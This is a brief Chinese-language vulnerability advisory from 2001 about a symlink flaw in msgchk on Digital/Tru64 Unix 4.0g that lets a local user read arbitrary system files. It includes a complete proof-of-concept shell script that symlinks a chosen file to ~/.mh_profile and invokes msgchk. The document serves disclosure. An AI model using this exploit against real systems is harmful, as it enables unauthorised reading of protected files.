Digital Unix MSGCHK MH_PROFILE 存在符号连接漏洞发布时间:2001-09-13 更新时间:2001-09-13 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Digital (Compaq) TRU64/DIGITAL UNIX 4.0g详细描述 Digital Unix中的msgchk存在安全漏洞,问题存在于msgchk在打开用户目录中 的用户配置文件时没有检查文件属性, 使用符号连接可以以使用msgchk用户的 权利读系统任意文件。 测试代码 ++ msgchkx.sh #!/bin/sh # truefinder, seo@igrus.inha.ac.kr # msgchk file read vulnerability if [ ! -f $1 ] then echo "usage : $0 <file path>" fi cd ~ ln -sf $1 ~/.mh_profile /usr/bin/mh/msgchk 解决方案 尚无 相关信息 |
